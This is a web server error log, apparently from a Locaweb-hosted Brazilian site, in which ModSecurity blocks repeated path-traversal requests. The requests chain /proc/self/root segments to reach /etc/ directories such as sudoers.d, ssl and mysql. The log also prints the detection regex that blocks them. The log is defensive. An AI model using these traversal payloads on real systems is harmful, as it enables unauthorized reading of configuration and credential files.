https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:06:43.727676 2026] [:error] [pid 6296:tid 140411607643904] [client 74.7.241.31:56586] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmmQnIk7brgkOH-rIWYbAAAAVA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:06:45.082211 2026] [:error] [pid 6296:tid 140411716749056] [client 74.7.241.31:56588] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmmRXIk7brgkOH-rIWYbwAAAUM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:06:47.899561 2026] [:error] [pid 29151:tid 140411632822016] [client 74.7.241.31:56596] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmmR_PqhzTj3BvfDX-UpAAAAc0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:06:49.187187 2026] [:error] [pid 7004:tid 140411582465792] [client 74.7.241.31:39666] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmmScU6Sx0TG1YjmQi7zQAAApM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:06:50.150950 2026] [proxy_fcgi:error] [pid 27444:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:33934] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:06:51.516632 2026] [:error] [pid 7004:tid 140411674785536] [client 74.7.241.31:39668] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmmS8U6Sx0TG1YjmQi7zwAAAog"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:06:52.827291 2026] [:error] [pid 7437:tid 140411649607424] [client 74.7.241.31:39682] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmmTAeiSKl8TjouI-YlJwAAA8s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:06:54.172000 2026] [:error] [pid 19507:tid 140411574073088] [client 74.7.241.31:39698] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmmTtY0UrI5A3LftIwKVAAAAZQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:06:55.645968 2026] [:error] [pid 25581:tid 140411607643904] [client 74.7.241.31:39708] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmmTxLxOFNDSaSvJXBXwAAAANA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:06:58.059512 2026] [:error] [pid 2473:tid 140411632822016] [client 74.7.241.31:39712] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmmUqBJNF7axNlVR0UllgAAAA0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:06:59.853685 2026] [:error] [pid 25048:tid 140411548894976] [client 74.7.241.31:40956] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmmU3XXq9-mGshjHG3NaAAAAFc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:07:01.332051 2026] [:error] [pid 25581:tid 140411548894976] [client 74.7.241.31:40970] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmmVRLxOFNDSaSvJXBXwwAAANc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:07:02.916622 2026] [:error] [pid 18380:tid 140411658000128] [client 74.7.241.31:40972] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmmVq4xEDsg_V3ESNZYmAAAAgo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:07:08.655449 2026] [:error] [pid 19507:tid 140411540502272] [client 74.7.241.31:40986] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmmXNY0UrI5A3LftIwKWgAAAZg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:07:14.160244 2026] [:error] [pid 19507:tid 140411616036608] [client 74.7.241.31:37074] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmmYtY0UrI5A3LftIwKYAAAAY8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:07:17.060154 2026] [:error] [pid 2598:tid 140411674785536] [client 74.7.241.31:37086] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmmZRj0p0SRWAqcjGGGUAAAAwg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:07:17.149829 2026] [proxy_fcgi:error] [pid 29151:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:34982] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:07:24.999746 2026] [:error] [pid 2598:tid 140411565680384] [client 74.7.241.31:55434] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmmbBj0p0SRWAqcjGGGWgAAAxU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:07:40.137781 2026] [proxy_fcgi:error] [pid 7437:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:35896] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:07:54.499204 2026] [:error] [pid 9299:tid 140411616036608] [client 74.7.241.31:55444] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmmir-sgTmmJoPuMdzDFwAAAs8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:07:57.464158 2026] [:error] [pid 25836:tid 140411607643904] [client 74.7.241.31:36446] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmmjYh-PF_25v4hFRB37wAAARA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:07:59.171144 2026] [:error] [pid 6296:tid 140411741927168] [client 74.7.241.31:52068] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmmj3Ik7brgkOH-rIWYrQAAAUA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:08:02.158925 2026] [proxy_fcgi:error] [pid 25048:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:36792] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:08:24.135834 2026] [proxy_fcgi:error] [pid 18380:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:37758] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:08:45.133786 2026] [proxy_fcgi:error] [pid 26033:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:38638] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:08:51.239466 2026] [:error] [pid 17965:tid 140411716749056] [client 74.7.244.43:48298] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmmw6t8Nd0UC_OcbVHWrQAAAIM"]
[Tue Mar 17 16:09:06.129868 2026] [proxy_fcgi:error] [pid 18380:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:39568] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:09:12.106936 2026] [:error] [pid 25836:tid 140411716749056] [client 74.7.241.31:52074] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmm14h-PF_25v4hFRB4HgAAAQM"], referer: 